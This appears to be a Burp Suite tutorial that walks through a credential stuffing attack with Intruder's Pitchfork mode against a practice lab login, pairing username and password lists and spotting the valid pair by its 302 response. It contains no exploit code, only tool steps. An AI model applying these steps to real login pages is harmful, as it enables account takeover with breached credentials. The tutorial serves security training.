Credential stuffing using a Burp Intruder Pitchfork attack
Last updated: January 27, 2023
Read time: 4 Minutes
Burp Intruder provides a number of different attack types, which determine the way in which payloads are injected into the defined payload positions.
The Pitchfork attack type is useful in cases where an attack requires you to send specific combinations of payloads from different lists in the same request.
In this tutorial, you'll learn:
- How a pitchfork attack works
- How to configure a basic pitchfork attack with two sets of payloads
- How to perform a credential stuffing attack
What is credential stuffing?
Credential stuffing is a form of brute-force attack in which an attacker attempts to log in to a site using a dictionary of known
username:password pairs from one or more other sites. These sets of credentials are typically obtained via earlier data breaches.
Pitchfork attacks are ideal for this purpose because you can ensure that each username is sent with its matching password. As you can see from the example below, the first item from each payload list is sent together, then the second item from each list, and so on.
You'll perform an attack just like this in the following tutorial.
Burp's browser is an easy way to proxy HTTP traffic - even over the encrypted HTTPS protocol. There is no setup required - simply go to the Proxy tab, click Open Browser, and ensure Intercept is off.
Step 1: Open the lab
Using Burp's browser, access the following lab:
While this lab is not intended to demonstrate this attack, it does feature a simple login form that we can use as an example.
Step 2: Send a login request to Burp Intruder
In the lab, click the My account link to open the login page. Submit the login form using any arbitrary values.
In Burp Suite, go to the Proxy > HTTP history tab. Find the
POST /login request and send it to Burp Intruder.
Step 3: Select the attack type
At the top of the Positions sub-tab, use the Attack type drop-down menu to select Pitchfork.
Step 4: Configure the payload positions
Click on the Intruder tab and go to the sub-tab with your request in.
On the Intruder > Positions sub-tab. This shows the request, with § markers automatically inserted around everything Burp has identified as a potential insertion point. This may include things like cookies that you do not want to replace with a payload. Use the Clear § button to clear all of these.
In our example, we are only replacing the username and password.
Highlight the value of the username parameter and click Add §. Do the same for the password parameter.
Step 5: Add the username payloads
Go to the Payloads sub-tab.
At the top of the tab is the Payload Sets option. This lets you alternate between different sets of payloads and configure them.
For a Pitchfork attack, you need to configure the same number payload sets as positions.
Select Payload set 1, then paste the list of candidate usernames into the Payload Options field.
Step 6: Add the password payloads
Select Payload set 2, then paste the list of candidate passwords into the Payload Options field.
Step 7: Start the attack
Click Start Attack. A new Intruder attack window opens. Here, you can see the requests made by Intruder in real-time.
Step 8: Analyze the results
You can sort the results of the attack by any column, and apply filters by clicking the Filter bar. This can help you to spot differences between responses and patterns of results.
In our example, you can see that the combination of
peter is the only one to return a
302 status code.
If you examine the response to this login, you can see that the server sent a new session cookie. This could indicate that the login was successful.
Subsequent login attempts receive a 400 error response because the original CSRF token included in each request doesn't correspond to the new session ID.
In addition to sorting the results, you can also configure Grep settings on the Options tab to flag results that match a pattern of text or extract text that matches a pattern.
Step 9: Confirm your results
In the browser, go back to the login page and log in using the credentials
wiener:peter to confirm that you have successfully identified a valid set of login credentials.
Congratulations, you have learned to configure pitchfork attacks and to use the Intruder Attack window to analyze the results.
In the wild, you may encounter additional defences, such as rate limiting, which make attacks like this more difficult. Why not check out the rest of our authentication-based materials on the Web Security Academy to learn more?
Was this article helpful?
An error occurred, please try again.